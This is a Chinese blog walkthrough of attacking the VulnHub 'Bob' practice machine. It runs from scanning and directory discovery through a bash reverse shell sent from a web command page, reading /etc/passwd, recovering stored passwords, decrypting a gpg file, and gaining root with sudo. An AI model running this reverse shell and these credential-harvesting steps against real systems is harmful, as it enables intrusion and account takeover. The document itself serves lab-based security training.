VulnHub-Bob靶机详细渗透过程

1.靶机部署

kali安装:https://blog.csdn.net/l2872253606/article/details/123592717?spm=1001.2014.3001.5502
靶机下载: https://download.vulnhub.com/bob/Bob_v1.0.1.ova
image.png
使用VMware打开该文件:
image.png
设置好名称和虚拟机位置:
注意:导入过程中可能会提示导入失败,点击重试即可。
image.png
进行基本设置:
image.png
导入成功,打开虚拟机,到此虚拟机部署完成!
image.png
注意:靶机的网络连接模式必须和kali一直,让DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机。

2.信息收集

2.1 探测IP

使用nmap扫描一下,发现151开启了80端口,浏览器访问一下发现就是我们的靶场:

192.168.11.0/24

image.png

2.2 详细信息扫描

nmap -A -T4 -p- 192.168.11.151

image.png

2.3 敏感目录

使用dirsearch扫描一下敏感目录:

dirsearch -u 192.168.11.151 -e *

image.png

2.4 指纹收集

扫描一下网站的CMS等信息:

whatweb -v 192.168.11.151

image.png

3.渗透过程

3.1 漏洞发现

我们在扫描网站敏感目录的时候曾看见过一个/robots.txt文件,访问一下试试:
image.png
逐个访问一下这几个目录,最后在/dev_shell.php文件下发现点东西:
image.png
试一下能不能执行linux命令:
image.png

3.2 反弹shell

既然可以执行反弹shell命令,那我们试着反弹一下shell,使用bash反弹:
首先kali开启监听:
image.png
输入框输入反弹shell代码:

bash -c ‘exec bash -i &>/dev/tcp/192.168.11.128/4444 <&1’

image.png
查看用户,发现了六个用户:

cat /etc/passwd | grep /bin/bash

image.png
大概对目录进行了查看,最后在/home/bob发现了一个名叫.old_passwordfile.html的文件,查看其内容发现了两组用户名和密码:

jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

image.png

3.3 登录用户

使用得到的用户ssh登录,注意端口不是默认端口
image.png
继续搜查目录:
在/home/bob/Documents目录下发现了一个login.txt.gpg文件,是个加密文件。
image.png
继续搜查,发现一个脚本文件,内容是输出一些语句,每行的首字母都是大写,将每一行的大写字母都提取出来 HARPOCRATES,这会不会就是刚刚加密文件的密码?
image.png
回到加密文件所在的地方,解密试试:

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

解密之后得到bob的用户名和密码:

bob:b0bcat_

image.png
使用bob用户登录,注意端口不是默认的22:

ssh bob@192.168.11.151 -p 25468

image.png

3.4 提权

查看bob有什么权限:

sudo -l

image.png
ALL,这是什么操作,bob拥有root用户的所有权限,那还不直接起飞:
image.png
果然,童话里都是骗人的,乖乖提权吧!!!
既然bob拥有root的所有的权限,那是不是可以直接切换root用户:

sudo su

image.png
提权成功!!!

夺旗

image.png

  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小秋LY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值